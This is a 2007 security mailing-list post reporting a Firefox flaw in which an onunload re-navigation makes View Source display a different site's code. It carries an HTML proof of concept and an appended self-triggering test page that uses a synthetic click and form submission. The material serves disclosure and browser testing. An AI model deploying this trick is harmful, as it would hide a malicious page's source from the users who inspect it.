Message-ID: <45E42FCC.9030508@westpoint.ltd.uk>
Date: Tue, 27 Feb 2007 13:19:08 +0000
From: Richard Moore <rich@...tpoint.ltd.uk>
To: Michal Zalewski <lcamtuf@...ne.ids.pl>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	security@...illa.org
Subject: Re: Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)



Michal Zalewski wrote:
> I can't really comment on whether
> this fixes the problem once and for all, because I haven't really examined
> the changes implemented for 364692, but yeah, my example no longer crashes
> the browser for me.

I think there are still underlying problems in the code as the
following illustrates:

1. Put this in a web page, then view it in firefox.

<html>
<body onunload="location = self.location">
<a href="http://slashdot.org/">http://slashdot.org/</a>
</body>
</html>

2. Click on the link which should take you to slashdot and you'll end
up back where you were (this has been known about for ages).

3. Now do 'View Source' and you get shown the sourcecode to slashdot 
rather than the source code for the page you're viewing.

Actual Results:
View source displays the contents of the wrong site

Expected Results:
I'd expect to see the source code for the page I'm viewing.

A web page could trigger the link itself using DOM events (or navigate
away using javascript form submission) and use this technique to hide
the source code of a malicious page from the user. I did a quick check
that document.cookie wasn't checking the wrong URL, but I have not
checked extensively which other parts of the browser can be spoofed
in this fashion.

I reported this via bugzilla, but it was closed as a duplicate of bug
253497 which was reported in 2004.

Cheers

Rich.
-- 
Richard Moore, Principal Software Engineer,
Westpoint Ltd,
Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
Tel: +44 161 237 1028
Fax: +44 161 237 1031

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
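The self-triggering variant Rich describes (the page starts the outbound navigation itself, via a DOM event or a JavaScript form submission, while its onunload handler re-navigates to the current URL), written out as an added example. This is not code from the original post or from Mozilla; the destination URL, the element ids and the hidden form field are assumptions. The behaviour reported above was observed on a 2007-era Firefox, and a current browser is not expected to reproduce it; the point of the page is to show the shape of the trick, not to assert that any given build still mishandles View Source.

```html
<!-- Added example, not from the original post. Self-triggered version of the
     onunload re-navigation PoC. Element ids, the hidden form field and the
     destination URL are assumptions. Reported behaviour is for 2007-era
     Firefox; current browsers are not expected to reproduce it. -->
<html>
<head>
<title>onunload self-navigation test</title>
</head>
<!-- Same handler as the manual PoC: when the page is being left, point the
     browser back at the page we are already on. -->
<body onunload="location = self.location">

<p>
  If, after the page settles, View Source shows the destination site rather
  than this markup, the source viewer has been confused by the re-navigation
  performed in onunload.
</p>

<a id="out" href="http://slashdot.org/">http://slashdot.org/</a>

<!-- Fallback path named in the post: JavaScript form submission. -->
<form id="f" action="http://slashdot.org/" method="get">
  <input type="hidden" name="from" value="onunload-test">
</form>

<script>
  // Start the navigation without any user click, as the post says a page could.
  function leaveViaDomEvent() {
    var a = document.getElementById('out');
    // Synthetic click through the DOM event model; older Gecko builds did not
    // honour a bare a.click() on anchors, so dispatch a MouseEvent instead.
    var ev = document.createEvent('MouseEvents');
    ev.initEvent('click', true, true);
    return a.dispatchEvent(ev);
  }

  function leaveViaFormSubmit() {
    // Second route named in the post: navigate away with a form submission.
    document.getElementById('f').submit();
  }

  window.onload = function () {
    leaveViaDomEvent();
    // If the synthetic click was not treated as a navigation, fall back to the
    // form. Either way, onunload fires and immediately re-navigates here.
    setTimeout(leaveViaFormSubmit, 500);
  };
</script>
</body>
</html>
```

Save this as a local file and open it in the browser under test; no click is needed. The only thing to compare is what View Source shows against what the address bar says is loaded, which is the discrepancy the post reports. Nothing here relies on document.write(), so a browser that has fixed the earlier memory-corruption issue can still be checked for the View Source confusion on its own.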
